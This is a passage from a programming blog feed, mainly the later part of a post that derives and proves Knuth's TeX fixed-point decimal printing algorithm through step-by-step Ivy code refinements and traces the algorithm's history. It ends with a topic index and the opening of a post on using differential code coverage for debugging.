deriving <math><mrow><MI>𝑚𝑎𝑥</MI><mo>=</mo><mi>s</mi></mrow></math>, <math><mrow><MI>𝑚𝑖𝑛</MI><mo>=</mo><mi>s</mi><mo>−</mo><mi>t</mi></mrow></math>, and <math><mrow><mi>f</mi><mo>=</mo><mi>s</mi><mo>−</mo><mi>t</mi><mn>/2</mn></mrow></math> as needed.
<p>
Let’s make that change to the program:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, (floor s) mod 10
:if (ceil s-t) <= (floor s)
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, (round s - t/2) mod 10
</pre>
<pre class='language-ivy'>check 'change of basis'
-- out --
✅ change of basis
</pre>
<a class=anchor href="#discard_integer_parts"><h2 id="discard_integer_parts">Discard Integer Parts</h2></a>
<p>
The next optimization is to reduce the size of <math><mi>s</mi></math> (formerly <math><MI>𝑚𝑎𝑥</MI></math>).
The only use of the integer part of <math><mi>s</mi></math> is to save
the ones digit on each iteration,
so we can discard the integer part
with <code>s = s mod 1</code> each time we save the ones digit.
That lets us optimize away the two uses of <code>mod 10</code>:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if (ceil s-t) <= (floor s)
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, round s - t/2
</pre>
<pre class='language-ivy'>check 'discard integer parts'
-- out --
✅ discard integer parts
</pre>
<p>
After the new <code>s = s mod 1</code>, <math><mrow><mrow><mo>⌊</mo><mi>s</mi><mo>⌋</mo></mrow><mo>=</mo><mn>0</mn></mrow></math>,
so the <code>if</code> condition is really <math><mrow><mrow><mo>⌈</mo><mrow><mi>s</mi><mo>−</mo><mi>t</mi></mrow><mo>⌉</mo></mrow><mo>≤</mo><mn>0</mn></mrow></math>,
which simplifies to <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math>.
Let’s make that change too:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
d, round s - t/2
</pre>
<pre class='language-ivy'>check 'simplify condition'
-- out --
✅ simplify condition
</pre>
<a class=anchor href="#refactoring"><h2 id="refactoring">Refactoring</h2></a>
<p>
Next, we can inline <code>round</code> on the last line:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while p <= 4
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
s = (s - t/2) + 1/2
d, floor s
</pre>
<pre class='language-ivy'>check 'inlined round'
-- out --
✅ inlined round
</pre>
<p>
Now the two uses of ‘<code>d, floor s</code>’ can be merged
by moving the final return back into the loop,
provided
(1) we make the <code>while</code> loop repeat forever,
(2) we apply the final adjustment to <math><mi>s</mi></math> when <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>,
and (3) we ensure that when <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, the <code>if</code> condition is true,
so that the return is reached.
The <code>if</code> condition is checking for digit divergence,
and we know that <math><MI>𝑚𝑖𝑛</MI></math> and <math><MI>𝑚𝑎𝑥</MI></math> will always diverge
by <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>, so the condition <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math> will be true.
We can also confirm that arithmetically:
<math><mrow><mi>t</mi><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>16</mn></mrow></msup><mo>></mo><mn>1</mn><mo>></mo><mi>s</mi></mrow></math>.
<p>
Let’s make that change:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
p = 1
s = 10 * s
t = 10 * t
d = ()
:while 1
:if p == 5
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
p = p + 1
s = 10 * s
t = 10 * t
:end
</pre>
<pre class='language-ivy'>check 'return only in loop'
-- out --
✅ return only in loop
</pre>
<p>
Next, since <math><mrow><mi>t</mi><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><MO form='prefix'>−</MO><mn>17</mn></mrow></msup></mrow></math>, we can replace the condition <math><mrow><mi>p</mi><mo>=</mo><mn>5</mn></mrow></math>
with <math><mrow><mi>t</mi><mo>></mo><mn>1</mn></mrow></math>, after which <math><mi>p</mi></math> is unused and can be deleted:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
s = 10 * s
t = 10 * t
d = ()
:while 1
:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
:if s <= t
:ret d
:end
s = 10 * s
t = 10 * t
:end
</pre>
<pre class='language-ivy'>check 'optimize away p'
-- out --
✅ optimize away p
</pre>
<p>
Next, note that the truth of <math><mrow><mi>s</mi><mo>≤</mo><mi>t</mi></mrow></math> is unchanged by
multiplying both <math><mi>s</mi></math> and <math><mi>t</mi></math> by 10
(and the return does not use them)
so we can move the conditional return
to the end of the loop body:
<pre class='language-ivy'>op bin2dec f =
s = f + 2**-17
t = 2**-16
s = 10 * s
t = 10 * t
d = ()
:while 1
:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = s mod 1
s = 10 * s
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'move conditional return'
-- out --
✅ move conditional return
</pre>
<p>
Finally, let’s merge the consecutive assignments to <math><mi>s</mi></math> and <math><mi>t</mi></math>,
both at the top of <code>bin2dec</code> and in the loop:
<pre class='language-ivy'>op bin2dec f =
s = 10 * f + 2**-17
t = 10 * 2**-16
d = ()
:while 1
:if t > 1
s = (s - t/2) + 1/2
:end
d = d, floor s
s = 10 * s mod 1
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'merge assignments'
-- out --
✅ merge assignments
</pre>
<a class=anchor href="#scaling"><h2 id="scaling">Scaling</h2></a>
<p>
All that remains is to eliminate the use of rational arithmetic.
which we can do by scaling <math><mi>s</mi></math> and <math><mi>t</mi></math> by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>:
<pre class='language-ivy'>op bin2dec f =
s = (10 * f * 2**16) + 5
t = 10
d = ()
:while 1
:if t > 2**16
s = (s - t/2) + 2**15
:end
d = d, floor s/2**16
s = 10 * s mod 2**16
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<pre class='language-ivy'>check 'no more rationals'
-- out --
✅ no more rationals
</pre>
<p>
If written in a modern compiled language,
this is a very efficient program.
(In particular, <code>floor s/2**16</code> and <code>s mod 2**16</code> are simple bit operations:
<code>s >> 16</code> and <code>s & 0xFFFF</code> in C syntax.)
<p>
And we have arrived at Knuth’s <i>P2</i>!
<pre class='language-ivy'>)op knuthP2
-- out --
op knuthP2 f =
n = f * 2**16
s = (10 * n) + 5
t = 10
d = ()
:while 1
:if t > 65536
s = s + 32768 - t/2
:end
d = d, floor s/65536
s = 10 * (s mod 65536)
t = 10 * t
:if s <= t
:ret d
:end
:end
</pre>
<p>
We started with a trivially correct program
and then incrementally modified it,
proving the correctness of each non-trivial step,
to arrive at <i>P2</i>.
We have therefore proved the correctness of <i>P2</i> itself.
<a class=anchor href="#simpler"><h2 id="simpler">Simpler Programs and Proofs</h2></a>
<p>
We passed a more elegant iterative solution a few steps back.
If we start with the premultiplied version,
apply the change of basis <math><mrow><mi>ε</mi><mo>=</mo><MI>𝑚𝑎𝑥</MI><mo>−</mo><mi>f</mi><mo>=</mo><mi>f</mi><mo>−</mo><MI>𝑚𝑖𝑛</MI></mrow></math>,
scale by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>, and change the program to
return an integer instead of a digit vector,
we arrive at:
<pre class='language-ivy'>op shortest f =
p = 1
f = 10 * f * 2**16
ε = 5
:while p < 5
:if (ceil (f-ε)/2**16) <= floor (f+ε)/2**16
:ret (floor (f+ε)/2**16) p
:end
p = p + 1
f = f * 10
ε = ε * 10
:end
(round f/2**16) p
</pre>
<p>
The program returns the digits as an integer accompanied by a digit count.
Any modern language can print an integer zero-padded to a given number of digits,
so there is no need for our converter to compute those digits itself.
<p>
We can test <code>shortest</code> by writing <code>bin2dec</code> in terms of <code>shortest</code> and <code>digits</code>:
<pre class='language-ivy'>op bin2dec f =
d p = shortest f
p digits d
</pre>
<pre class='language-ivy'>check 'simpler'
-- out --
✅ simpler
</pre>
<p>
The full proof of correctness is left as an exercise to the reader,
but note that the proof is simpler than the one we just gave for <i>P2</i>.
Since we are not collecting digits one at a time,
we do not need the <a href="#collection">Digit Collection Lemma</a>.
<p>
This version of <code>shortest</code> could be made faster
by using <i>P2</i>’s <math><mrow><mi>s</mi><mo>,</mo><mi>t</mi></mrow></math> basis,
but I think this form using the <math><mrow><mi>f</mi><mo>,</mo><mi>ε</mi></mrow></math> basis is clearer,
and the cost is only one extra addition in the loop body.
The cost of that addition is unlikely to be important compared to
the two multiplications and other arithmetic
(two shifts, one subtraction, one comparison, one increment).
<p>
One drawback of this simpler program is that it requires
<math><mi>f</mi></math> to hold numbers up to <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>5</mn></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup><mo>></mo><mn>2</mn><msup><mspace height='0.66em' /><mn>32</mn></msup></mrow></math>,
so it needs <math><mi>f</mi></math> to be a 64-bit integer,
and the system Knuth was using probably did not support 64-bit integers.
However, we can adapt this simpler program to
work with 32-bit integers
by observing that each multiplication by 10 adds a new
always-zero low bit, so we can multiply by 5 and adjust
the precision <math><mi>b</mi></math>:
<pre class='language-ivy'>op shortest f =
b = 16
p = 1
f = 10 * f * 2**b
ε = 5
:while p < 5
:if (ceil (f-ε)/2**b) <= floor (f+ε)/2**b
:ret (floor (f+ε)/2**b) p
:end
p = p + 1
b = b - 1
f = f * 5
ε = ε * 5
:end
(round f/2**b) p
</pre>
<pre class='language-ivy'>check '32-bit'
-- out --
✅ 32-bit
</pre>
<p>
All modern languages provide efficient 64-bit arithmetic,
so we don’t need that optimization today.
<a class=anchor href="#more_direct_solution"><h2 id="more_direct_solution">A More Direct Solution</h2></a>
<p>
Raffaello Giulietti’s <a href="https://fmt.dev/papers/Schubfach4.pdf">Schubfach algorithm</a>
avoids the iteration entirely.
Applied to Knuth’s problem,
we can let <math><mrow><mi>p</mi><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>10</mn></msub><mspace width='0.166em' /><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow><mo stretchy=false>⌉</mo></mrow><MO>(=</MO><mn>5</mn><mo stretchy=false>)</mo></mrow></math> and
compute the exact set of accurate <math><mi>p</mi></math>-digit decimals
<math><mrow><mo>[</mo><msub><mrow><mo stretchy=false>⌈</mo><MI>𝑚𝑖𝑛</MI><mo stretchy=false>⌉</mo></mrow><mi>p</mi></msub><mspace width='0.166em' /><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mn>.</mn><mspace width='0.166em' /><mspace width='0.166em' /><msub><mrow><mo stretchy=false>⌊</mo><MI>𝑚𝑎𝑥</MI><mo stretchy=false>⌋</mo></mrow><mi>p</mi></msub><mo>]</mo></mrow></math>.
That set contains at most 10 consecutive decimals
(or else <math><mi>p</mi></math> would be smaller),
so at most one can end in a zero.
If one of the accurate decimals <math><mi>d</mi></math> ends in zero,
we can use <math><mi>d</mi></math> after removing its trailing zeros.
(The <a href="#truncating">Truncating Lemma</a> guarantees
that this shortest accurate decimal will be correctly rounded.)
Otherwise,
we should use the correctly rounded <math><msub><mrow><mo>[</mo><mi>f</mi><mo>]</mo></mrow><mi>p</mi></msub></math>.
<pre class='language-ivy'>op shortest f =
b = 16
p = ceil 10 log 2**b
f = (10**p) * f * 2**b
t = (10**p) * 1/2
min = ceil (f - t) / 2**b
max = floor (f + t) / 2**b
:if ((d = floor max / 10) * 10) >= min
p = p - 1
:while ((d mod 10) == 0) and p > 1
d = d / 10
p = p - 1
:end
:ret d p
:end
(round f / 2**b) p
</pre>
<pre class='language-ivy'>check 'schubfach'
-- out --
✅ schubfach
</pre>
<p>
This program still contains a loop,
but only to remove trailing zeros.
In many use cases, short outputs will happen less often than
full-length outputs, so most calls will not loop at all.
Also, all modern compilers implement division by a constant
<a href="divmult">using multiplication</a>,
so the loop costs at most <math><mrow><mi>p</mi><MO lspace='0' rspace='0'>−</MO><mn>1</mn></mrow></math> multiplications.
Finally, we can shorten the worst case,
at the expense of the best case,
by using a <math><mrow><mo stretchy=false>(</mo><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /><mi>p</mi><mo stretchy=false>)</mo></mrow></math>-iteration loop:
divide away <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/2</mn></mrow><mo stretchy=false>⌋</mo></mrow></math> trailing zeros
(by checking <math><mrow><mi>d</mi><MO>mod</MO><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/2</mn></mrow><mo stretchy=false>⌋</mo></mrow></msup></mrow></math>), then <math><mrow><mo stretchy=false>⌊</mo><mrow><mi>p</mi><mn>/4</mn></mrow><mo stretchy=false>⌋</mo></mrow></math>, and so on.
<a class=anchor href="#textbook"><h2 id="textbook">A Textbook Solution</h2></a>
<p>
All of this raises a mystery.
Knuth started writing TeX82, which introduced the 16-bit fixed-point number
representation, in August 1981 (according to “<a href="https://yurichev.com/mirrors/knuth1989.pdf">The Errors of TeX</a>”, page 616),
and the change to introduce shortest outputs
was made in February 1984 (according to <a href="https://ctan.math.utah.edu/ctan/tex-archive/systems/knuth/dist/errata/tex82.bug">tex82.bug, entry 284</a>).
The mystery is why Knuth,
working in the early 1980s, did not consult a recently published
textbook that contains the answer,
namely
<i>The Art of Computer Programming, Volume 2: Seminumerical Algorithms (Second Edition)</i>, by D. E. Knuth
(preface dated July 1980).
<center>
<img src="detour1.png" width="100" height="100" alt="Detour sign"><br>
</center>
<p>
Before getting to the mystery, we need to detour through
the history of that specific answer.
The first edition of Volume 2 (preface dated October 1968), contained exercise 4.4-3:<blockquote>
<ol>
<li>
[25] (D. Taranto.) The text observes that when fractions are being converted,
there is in general no obvious way to decide how many digits to give in the answer.
Design a simple generalization of Method (2a)
[incremental digit-at-a-time fraction conversion]
which, given two positive radix <math><mi>b</mi></math> fractions <math><mi>u</mi></math> and <math><mi>ε</mi></math> between 0 and 1,
converts <math><mi>u</mi></math> to a radix <math><mi>B</mi></math> equivalent <math><mi>U</mi></math> which has just enough
places of accuracy to ensure that <math><mrow><mrow><mn>|</mn><mrow><mi>U</mi><mo>−</mo><mi>u</mi></mrow><mn>|</mn></mrow><mo><</mo><mi>ε</mi></mrow></math>.
(If <math><mrow><mi>u</mi><mo><</mo><mi>ε</mi></mrow></math>, we may take <math><mrow><mi>U</mi><mo>=</mo><mn>0</mn></mrow></math>, with zero “places of accuracy.”)</ol>
</blockquote>
<p>
The answer at the back of the book starts with the notation “[CACM 2 (July 1959), 27]”,
indicating Taranto’s article “<a href="https://dl.acm.org/doi/10.1145/368370.368376">Binary conversion, with fixed decimal precision, of a decimal fraction</a>”.
Taranto’s article is about converting a decimal fraction to a shortest binary
representation, a somewhat simpler problem than Knuth’s exercise poses.
Written in Ivy, with variable names chosen to match this post,
and scaling to accumulate bits in an integer during the loop,
Taranto’s algorithm is:
<pre class='language-ivy'>op taranto (f ε) =
fb = 0
b = 0
:while (ε < f) and (f < 1-ε)
f = 2 * f
fb = (2 * fb) + floor f
f = f mod 1
ε = 2 * ε
b = b + 1
:end
:if (fb & 1) == 0
fb = fb + 1
:end
fb / 2**b
</pre>
<p>
If we write <math><mrow><mi>f</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> and <math><mrow><mi>ε</mi><msub><mspace height='0em' /><mn>0</mn></msub></mrow></math> for the initial <math><mi>f</mi></math> and <math><mi>ε</mi></math>
passed to <code>shortest</code>,
then the algorithm accumulates a binary output in <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub></mrow></math>,
and maintains <math><mrow><mi>f</mi><mo>=</mo><mo stretchy=false>(</mo><mi>f</mi><msub><mspace height='0em' /><mn>0</mn></msub><mo>−</mo><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mo stretchy=false>)</mo><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>,
the scaled error of the current output compared to the original input.
When <math><mrow><mi>f</mi><mo>≤</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub></mrow></math> is close enough;
when <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mo>+</mo><mn>1</mn></mrow></math> is close enough.
Otherwise, the algorithm loops to add another output bit.
<p>
After the loop, the algorithm forces the low bit to 1.
This handles the “when <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>, <math><mrow><mi>f</mi><msub><mspace height='0em' /><mi>b</mi></msub><mo>+</mo><mn>1</mn></mrow></math> is close enough” case.
It would have been clearer to write <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>,
but testing the low bit is equivalent.
If the last bit added was 0,
the final iteration started with <math><mrow><mi>ε</mi><mo><</mo><mi>f</mi></mrow></math> and did <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><mi>f</mi><mo>,</mo><mi>ε</mi><mo>=</mo><mn>2</mn><mi>ε</mi></mrow></math>,
in which case <math><mrow><mi>ε</mi><mo><</mo><mi>f</mi></mrow></math> must still be true
and the loop ended because <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>.
And if the last bit added was 1,
the final iteration started with <math><mrow><mi>f</mi><mo><</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> and did <math><mrow><mi>f</mi><mo>=</mo><mn>2</mn><mi>f</mi><mo>−</mo><mn>1</mn><mo>,</mo><mi>ε</mi><mo>=</mo><mn>2</mn><mi>ε</mi></mrow></math>,
in which case <math><mrow><mi>f</mi><mo><</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> must still be true
and the loop ended because <math><mrow><mi>f</mi><mo>≤</mo><mi>ε</mi></mrow></math>.
<p>
(In fact, Taranto’s presentation took advantage of the fact that
the low bit tells you which half of the loop condition is possible;
it only checked the possible half in each iteration.
For simplicity, the Ivy version omits that optimization.
If you read Taranto’s article, note that the computation
of the loop condition is correct in step B at the top of the page
but incorrect in the IAL code at the bottom of the page.)
<p>
For the answer to exercise 4.4-3, Knuth needed to
generalize Taranto’s algorithm to non-binary outputs (<math><mrow><mi>B</mi><mo>></mo><mn>2</mn></mrow></math>),
which he did by changing the final condition to <math><mrow><mi>f</mi><mo>></mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math>.
For decimal output, the implementation would be:
<pre class='language-ivy'>op shortest f =
ε = 2**-17
d = 0
p = 0
:while (ε < f) and (f < 1-ε)
f = 10 * f
d = (10 * d) + floor f
f = f mod 1
ε = 10 * ε
p = p + 1
:end
:if f > 1-ε
d = d + 1
:end
d (1 max p)
</pre>
<p>
Knuth’s presentation generated digits one at a time
into an array.
I’ve accumulated them into an integer <math><mi>d</mi></math> here,
but that’s only a storage detail.
When incrementing the low digit after the loop,
Knuth’s answer also checked for overflow
from the low digit into higher digits.
That check is unnecessary: if the increment
overflows the bottom digit to zero,
that implies the bottom digit can be removed entirely,
in which case the loop would have stopped earlier.
<p>
It turns out that this code is not an answer
to our problem:
<pre class='language-ivy'>check 'Knuth Volume 2 1e'
-- out --
❌ Knuth Volume 2 1e
</pre>
<p>
The problem is that while it does compute a
shortest accurate decimal, it does not guarantee
correct rounding:
<pre class='language-ivy'>shortest dec2bin 0.12344
-- out --
12345 5
</pre>
<p>
For binary output,
shortest and correctly rounded are one and the same;
not so in other bases.
As an aside, Taranto’s forcing of the low bit to 1
mishandles the corner case <math><mrow><mi>f</mi><mo>=</mo><mn>0</mn></mrow></math>.
Knuth’s updated condition fixes that case,
but it doesn’t correctly round other cases.
All that said, Knuth’s exercise did not ask for correct rounding,
so the answer is still correct for the exercise.
<p>
Guy L. Steele and Jon L. White, working in the 1970s
on fixed-point and floating-point formatting,
consulted Knuth’s first edition and adapted this answer
to round correctly.
They wrote a paper with their new algorithms,
both for the fixed-point case we are considering
and for the more general case of floating-point numbers.
That paper presents a correctly-rounding extension of Knuth’s
first edition answer as the algorithm ‘(FP)³’.
The change is tiny: replace <math><mrow><mi>f</mi><mo>≥</mo><mn>1</mn><mo>−</mo><mi>ε</mi></mrow></math> with <math><mrow><mi>f</mi><mo>≥</mo><mn>½</mn></mrow></math>.
<pre class='language-ivy'>op shortest f =
ε = 2**-17
d = 0
p = 0
:while (ε < f) and (f < 1-ε)
f = 10 * f
d = (10 * d) + floor f
f = f mod 1
ε = 10 * ε
p = p + 1
:end
:if f >= 1/2
d = d + 1
:end
d (1 max p)
</pre>
<pre class='language-ivy'>check 'Steele and White (FP)³'
-- out --
✅ Steele and White (FP)³
</pre>
<p>
In the paper,
Steele and White described the (FP)³ algorithm as
“a generalization of the one
presented by Taranto [Taranto59]
and mentioned in exercise 4.4.3 of [Knuth69].”
They shared the paper with Knuth
while he was working on the second edition of Volume 2.
In response, Knuth changed the exercise to ask for a
“<i>rounded</i> radix <math><mi>B</mi></math> equivalent” (my emphasis),
updated the answer to use the new fix-up condition,
removed the unnecessary overflow check,
and cited Steele and White’s unpublished paper.
Knuth introduced the revised answer by saying,
“The following procedure due to G. L. Steele Jr. and Jon L. White
generalizes Taranto’s algorithm for <math><mrow><mi>B</mi><mo>=</mo><mn>2</mn></mrow></math> originally published in
<i>CACM</i> <b>2</b>, 7 (July 1959), 27.”
The attribution ‘due to [Steele and White]’
omits Knuth’s own substantial contributions
to the generalization effort.
<p>
Steele and White <a href="https://dl.acm.org/doi/10.1145/93548.93559">published their paper in 1990</a>,
and
Knuth cited it in the third edition of Volume 2 (preface dated July 1997).
At first glance, this seems to create a circular reference in which
both works credit the other for the algorithm,
like a self-justifying
<a href="https://research.swtch.com/plmm#acausality">out-of-thin-air value</a>.
The cycle is broken by noticing that Steele and White carefully
cite the <i>first edition</i> of Volume 2.
<center>
<img src="detour2.png" width="100" height="100" alt="Detour sign"><br>
</center>
<p>
In 1984, as Knuth was writing TeX82 and needed code to
implement this conversion, the second edition
had just been published a few years earlier.
So why did Knuth invent a new variant of Taranto’s algorithm
instead of using the one he put in Volume 2?
I find it comforting to imagine that
he made the same mistake we’ve all made
at one time or another: perhaps Knuth simply forgot to check <i>Knuth</i>.
<p>
But probably not.
Knuth’s “Simple Program” paper
names Steele and White and
cites the answer to exercise 4.4-3.
The wording of the citation suggests that Knuth did not consider
it an answer to his question “Is there a better program?”
Why not?
I don’t know,
but we just saw that it does work.
I plan to
<a href="https://www-cs-faculty.stanford.edu/~knuth/email.html">send Knuth a letter</a> to ask.
<p>
<small>(<a href="https://cs.stanford.edu/~knuth/diamondsigns/D05.html">Detour</a> <a href="https://cs.stanford.edu/~knuth/diamondsigns/D09.html">sign</a> <a href="https://cs.stanford.edu/~knuth/diamondsigns/diam.html">photos</a> by Don Knuth.)</small>
<a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a>
<p>
This post shows what I think is a better way to prove the
correctness of Knuth’s <i>P2</i>,
as well as a few candidates for better programs.
More generally, I think the post illustrates that
the capabilities of our programming tools affect
the programs we write with them and
how easy it is to prove those programs correct.
<p>
If you are programming a 32-bit computer in the 1980s using a Pascal-like language
in which division is expensive,
it makes perfect sense to compute one digit at a time in a loop
as Knuth did in <i>P2</i>.
Going back even further, the iterative digit-at-a-time approach
<a href="https://www.ias.edu/sites/default/files/library/pdfs/ecp/planningcodingof0103inst.pdf">made sense on Von Neumann’s computer in the 1940s</a> (see p. 53).
Today, a language
with arbitrary precision rationals
makes it easy to write simpler programs.
<p>
The choice of language also affects the difficulty of the proof.
Using Ivy made it natural to break the proof into pieces.
We started with a simple proof of a nearly trivial program.
Then we proved the correctness of the “truncated max” version.
Finally we proved the correctness of collecting digits one at a time.
It was easier to write three small proofs than one large proof.
Ivy also made it easy to isolate the complexity of premultiplication
by <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> and scaling by <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>16</mn></msup></mrow></math>; we were able to treat those
steps as optimizations instead of fundamental aspects of the program and proofs.
Now that we know the path, we could write a direct proof of <i>P2</i>
along these lines.
But I wouldn’t have seen the path without having a capable language
like Ivy to light the way.
<p>
It is also worth noting how the capabilities of our programming
tools affect our perception of what is important in our programs.
After writing his 1989 paper, Knuth optimized
‘<i>s</i> := <i>s</i> + 32768 − (<i>t</i> <b>div</b> 2)’
in the production version of TeX to
‘<i>s</i> := <i>s</i> − 17232’, because at that point
<i>t</i> is always 100000.
On the <a href="https://en.wikipedia.org/wiki/IBM_650">IBM 650</a> at Case Institute of Technology
where Knuth got his start
(and to which he dedicated his <i>The Art of Computer Programming</i> books),
removing a division and an addition might have been important.
In 1989, however, a good compiler would have optimized ‘<i>t</i> <b>div</b> 2’ to a shift,
and the shift and add would hardly matter compared to the
eight multiplications that preceded them, not to mention the I/O
to print the result,
and the code was probably clearer the first way.
But old habits die hard for all of us.
I spent my formative years programming 32-bit systems, and
I have not broken my old habit
of worrying about ‘32-bit safety’,
as evidenced by <a href="#simpler">the discussion above</a>!
<p>
Knuth wrote in his paper that
“we seek a proof that is comprehensible and educational” and then added:<blockquote>
<p>
Even more, we seek a proof that reflects the ideas used to create
the program, rather than a proof that was concocted ex post facto.
The program didn’t emerge by itself from a vacuum, nor did I simply
try all possible short programs until I found one that worked.</blockquote>
<p>
This post is almost certainly not the proof Knuth sought.
On the other hand, I hope that it is comprehensible and educational.
Also, Taranto’s short article
doesn’t include any proof at all,
nor even an explanation of how it works.
If I had to prove Taranto’s algorithm correct,
I would probably proceed as in the initial part of this post.
Then, if you accept Taranto’s algorithm as correct,
the main changes on the way to <i>P2</i> are to
nudge <math><mi>f</mi></math> up to <math><MI>𝑚𝑎𝑥</MI></math> at the start
and then nudge it back down on the final iteration.
The
<a href="#truncating">Truncating Lemma</a>
and the <a href="#collection">Digit Collection Lemma</a>
prove the correctness of those changes.
Maybe that does match what Knuth had in mind in 1984
when he adapted Taranto’s algorithm.
Maybe the difficulty arose from
having to prove Taranto’s algorithm correct simultaneously.
This post’s incremental approach avoids that complication.
<p>
In any event, Happy 88th Birthday Don!
<p>
<p>
P.S. This is my first blog post using my blog’s new support for
embedding Ivy code and for typesetting equations.
For the latter, I write TeX syntax like inline <code>`$s ≤ t$`</code>
or fenced <code>```eqn</code> blocks.
A new TeX macro parser that I wrote executes the TeX input
and translates the expanded output to MathML Core,
which all the major browsers now support.
It is only fitting that this is the first post to use
the new TeX-derived mathematical typesetting.
Floating Point Formattingtag:research.swtch.com,2012:research.swtch.com/fp-all2026-01-10T08:00:00-05:002026-01-10T08:02:00-05:00Topic Index
<p>
These are the posts in the “Floating Point Formatting” series,
which started in 2011 and continued in 2026.
<ul>
<li>
“<a href="ftoa">Floating Point to Decimal Conversion is Easy</a>” (2011)
<li>
“<a href="fp-knuth">Pulling a New Proof from Knuth’s Fixed-Point Printer</a>” (2026)
<li>
“<a href="fp">Floating-Point Printing and Parsing Can Be Simple And Fast</a>” (2026)
<li>
“<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>” (2026)</ul>
Differential Coverage for Debuggingtag:research.swtch.com,2012:research.swtch.com/diffcover2025-04-25T11:40:00-04:002025-04-25T11:42:00-04:00Diffing code coverage for passing and failing runs can identify suspicious code blocks.<style>
pre {
white-space: pre-wrap; /* Since CSS 2.1 */
white-space: -moz-pre-wrap; /* Mozilla, since 1999 */
white-space: -pre-wrap; /* Opera 4-6 */
white-space: -o-pre-wrap; /* Opera 7 */
word-wrap: break-word; /* Internet Explorer 5.5+ */
}
</style>
<p>
I have been debugging some code I did not write and was reminded of this technique.
I’m sure it’s a very old debugging technique (like <a href="bisect">bisection</a>),
but it should be more widely known.
Suppose you have one test case that’s failing.
You can get a sense of what code might be involved by comparing the code coverage
of successful tests with the code coverage of the failing test.
<p>
For example, I’ve inserted a bug into my development copy of <code>math/big</code>:
<pre>
$ <b>go test</b>
--- FAIL: TestAddSub (0.00s)
int_test.go:2020: addSub(-0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff) = -0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe, want 0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
FAIL
exit status 1
FAIL math/big 7.528s
$
</pre>
<p>
Let’s collect a passing and failing profile:
<pre>
